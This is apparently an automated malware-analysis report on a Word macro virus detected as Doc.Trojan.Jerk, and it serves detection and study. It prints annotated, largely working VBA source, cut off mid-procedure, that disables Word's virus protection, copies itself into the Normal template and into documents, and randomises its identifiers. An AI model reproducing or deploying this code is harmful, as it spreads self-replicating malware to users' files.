Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c694a06fc499869d…

MALICIOUS

Office (OLE)

Size: 41.5 KB · Created: 1997-04-26 16:26:00 · Authoring application: Microsoft Word 8.0 · First seen: 2012-06-14
MD5: 62d3049011d559d0305eec96bda185df SHA-1: c2d7ce310d344379adef4c31bd516a8f3f690e1a SHA-256: c694a06fc499869d64b0521531b82c605eaae78abb6f239c16dec0a0214f2a1d
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with multiple signatures, indicating a known trojan. The presence of VBA macros, specifically the use of GetObject and the large macro source size, suggests an attempt to execute malicious code. The macro code appears to be obfuscated, and the preview below is truncated, but the overall structure points towards a downloader or dropper functionality, likely intended to deliver a second-stage payload.

Heuristics (3)

  • ClamAV: Doc.Trojan.Jerk-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Jerk-7
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30233 bytes
SHA-256: 17a9d52c23fca329d4a0349fc61b7dea0cafa697a594946d5d1c05937593d448
Detection
ClamAV: Doc.Trojan.Jerk-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attribute header as written by the VBA exporter (olevba-decoded) for the
' ThisDocument class module. Nothing here executes; the behaviour of the sample is
' in the event handler and helper procedures that follow.

































' Document_Close event handler: runs whenever the document is closed, so everything
' below is triggered by ordinary use of the file rather than by any explicit action.
Private Sub Document_Close()
' Errors are suppressed for the whole routine, so failed object-model calls stay silent.
On Error Resume Next
' Randomly named constants stand in for True / False / 0 / 1, the two Word save-format
' enums (document and template) and the ":" character; these names are the
' obfuscation the report refers to, the logic itself is plain.
Const SFSSGK = True, KCAQJMOJJDRYHY = False, KJJXWAMOIUASANT = 0, KSCGZOGSQMYM = 1, XUGVOQRVYOYIXPC = wdFormatDocument, PYZYGN = wdFormatTemplate, QMWRMNE = ":"
Dim IYFCTHWLZBKHCVX, QZPOEJNWRCZWQK, TSBBZRVHYEGJZ, PAIRETTUYL As Boolean
Dim QDYQIGDMTNCRJGL, LOFGEOSILO As Object
Dim VKCFZKHOPULL, NANUCHZCFZ As String
' Date-triggered payload: on the 14th of any month after May a taunting message box
' titled "Class.Poppy" is shown. This is the only user-visible effect in the routine,
' and the "jerk" wording matches the ClamAV signature name given on this page.
If Day(Now) = 14 And Month(Now) > 5 Then MsgBox "I think " & Application.UserName & " is a big stupid jerk!", 0, "Class.Poppy"
' Grabs the first VBA component of the open document and of the Normal template.
' Programmatic access to VBProject is what makes the module copy below possible;
' current Word versions gate it behind the "Trust access to the VBA project object
' model" option, which is the setting to keep disabled on endpoints.
Set QDYQIGDMTNCRJGL = ActiveDocument.VBProject.VBComponents.Item(KSCGZOGSQMYM)
Set LOFGEOSILO = NormalTemplate.VBProject.VBComponents.Item(KSCGZOGSQMYM)
Randomize
' Flags: TSBBZRVHYEGJZ = the document's module already holds code,
'        PAIRETTUYL    = the Normal template's module already holds code.
TSBBZRVHYEGJZ = KCAQJMOJJDRYHY
PAIRETTUYL = KCAQJMOJJDRYHY
If QDYQIGDMTNCRJGL.CodeModule.CountOfLines <> KJJXWAMOIUASANT Then TSBBZRVHYEGJZ = SFSSGK
If LOFGEOSILO.CodeModule.CountOfLines <> KJJXWAMOIUASANT Then PAIRETTUYL = SFSSGK
' Switches off Word's built-in macro-virus warning so later opens do not prompt.
' Detection note: a legitimate macro has no reason to write Options.VirusProtection.
Options.VirusProtection = KCAQJMOJJDRYHY
' Proceeds only when exactly one of the two modules carries code (Xor) and the
' document is saved in a format that can hold macros (.doc or .dot).
If (TSBBZRVHYEGJZ = SFSSGK Xor PAIRETTUYL = SFSSGK) And (ActiveDocument.SaveFormat = XUGVOQRVYOYIXPC Or ActiveDocument.SaveFormat = PYZYGN) Then
' Case 1: the document carries the code and Normal does not -> copy the module source
' into the Normal template, which persists across Word sessions.
If TSBBZRVHYEGJZ = SFSSGK Then
QZPOEJNWRCZWQK = NormalTemplate.Saved
' Reads the whole module as one string.
NANUCHZCFZ = QDYQIGDMTNCRJGL.CodeModule.Lines(KSCGZOGSQMYM, QDYQIGDMTNCRJGL.CodeModule.CountOfLines)
' RNKAIGOZLFWPJ and KNIUGYJYGURSY are defined outside this excerpt; what they do to
' the source cannot be confirmed from the preview.
Call RNKAIGOZLFWPJ(NANUCHZCFZ)
' Roughly one run in ten (Int(Rnd * 10) = 7) the source is also passed through
' KNGJXOZZSHM, which from the partial listing further down appears to replace
' identifiers with random letter strings -- the source of the varying signatures.
If Int(Rnd * 10 * KSCGZOGSQMYM) = KSCGZOGSQMYM * 7 Then Call KNGJXOZZSHM(NANUCHZCFZ)
Call KNIUGYJYGURSY(NANUCHZCFZ)
LOFGEOSILO.CodeModule.InsertLines KSCGZOGSQMYM, NANUCHZCFZ
' Re-saves Normal only if it was already in a saved state, presumably so the user
' sees no change in save status.
If QZPOEJNWRCZWQK = SFSSGK Then NormalTemplate.Save
End If
' Second character of the full path: ":" means the document has a drive-letter path,
' i.e. it has been saved to disk.
VKCFZKHOPULL = Mid(ActiveDocument.FullName, 2, KSCGZOGSQMYM)
' Case 2: Normal carries the code and the document does not -> copy the module source
' into the open document, the spreading direction.
If PAIRETTUYL = SFSSGK And (VKCFZKHOPULL = QMWRMNE Or ActiveDocument.Saved = KCAQJMOJJDRYHY) Then
IYFCTHWLZBKHCVX = ActiveDocument.Saved
NANUCHZCFZ = LOFGEOSILO.CodeModule.Lines(KSCGZOGSQMYM, LOFGEOSILO.CodeModule.CountOfLines)
Call KNIUGYJYGURSY(NANUCHZCFZ)
QDYQIGDMTNCRJGL.CodeModule.InsertLines KSCGZOGSQMYM, NANUCHZCFZ
' Same saved-state preservation as for Normal above.
If IYFCTHWLZBKHCVX = SFSSGK Then ActiveDocument.Save
End If
End If
End Sub
Private Sub KNGJXOZZSHM(ByRef NANUCHZCFZ As String)
On Error Resume Next
Const ZIJVOF = 48, ZQCUFKOKTYX = 15, LYZXQTVTHQRPPNA = 5, MTTWUHZUGESQCCY = 65, QHCTJ = 90, KSCGZOGSQMYM = 1, SFSSGK = True, KCAQJMOJJDRYHY = False
Dim GMPCJXHAP, YDAMMTmp, WCDKOQDAC, YDAMM(KSCGZOGSQMYM To ZIJVOF), YDAMM2(KSCGZOGSQMYM To ZIJVOF) As String
Dim BLRXPBCZWINJ, EJXKD, IUKGXYNVW As Integer
Dim SLJRHVJ As Boolean
GMPCJXHAP = "NANUCHZCFZ ZIJVOF YDAMM YDAMM2 WCDKOQDAC BLRXPBCZWINJ EJXKD IUKGXYNVW SLJRHVJ KNGJXOZZSHM ZQCUFKOKTYX LYZXQTVTHQRPPNA MTTWUHZUGESQCCY QHCTJ KSCGZOGSQMYM GMPCJXHAP YDAMMTmp IYFCTHWLZBKHCVX QZPOEJNWRCZWQK TSBBZRVHYEGJZ PAIRETTUYL QDYQIGDMTNCRJGL LOFGEOSILO RNKAIGOZLFWPJ XQZONFLXNIZ UWDBOZBBTFDPYN XGZQH EQWRNZSRCXGI XQZONFLXNIZTmp TXFCLERDMBMXUH BNZVYEHGN VKCFZKHOPULL SFSSGK KCAQJMOJJDRYHY KJJXWAMOIUASANT XUGVOQRVYOYIXPC PYZYGN DCZWUW TIAIDQTFFKYTYPG QMWRMNE MVUQOOUIAA YBOVNV JWLRKMJNEKEVGM GLRKFIDJ KNIUGYJYGURSY AYQBIAYTMDCAQX SOHUZ LPXOGR"
Randomize
EJXKD = KSCGZOGSQMYM
For BLRXPBCZWINJ = KSCGZOGSQMYM To Len(GMPCJXHAP)
If Mid(GMPCJXHAP, BLRXPBCZWINJ, KSCGZOGSQMYM) = " " Or BLRXPBCZWINJ = Len(GMPCJXHAP) Then
If BLRXPBCZWINJ = Len(GMPCJXHAP) Then YDAMMTmp = YDAMMTmp & Mid(GMPCJXHAP, BLRXPBCZWINJ, KSCGZOGSQMYM)
For IUKGXYNVW = KSCGZOGSQMYM To Int((ZQCUFKOKTYX - LYZXQTVTHQRPPNA + KSCGZOGSQMYM) * Rnd + LYZXQTVTHQRPPNA)
YDAMM2(EJXKD) = YDAMM2(EJXKD) & Chr(Int((QHCTJ - MTTWUHZUGESQCCY + KSCGZOGSQMYM) * Rnd + MTTWUHZUGESQCCY))
Next IUKGXYNVW
YDAMM(EJXKD) = YDAMMTmp
YDAMMTmp = ""
EJXKD = EJXKD + KSCGZOGSQMYM
Else
YDAMMTmp = YDAMMTmp & Mid(GMPCJXHAP, BLRXPBCZWINJ, KSCGZOGSQMYM)
End If
Next BLRXPBCZWINJ
SLJRHVJ = KCAQJMOJJDRYHY
For BLRXPBCZWINJ = KSCGZOGSQMYM To Len(NANUCHZCFZ)
For EJXKD = KSCGZOGSQMYM To ZIJVOF
If Mid(NANUCHZCFZ, BLRX
... (truncated)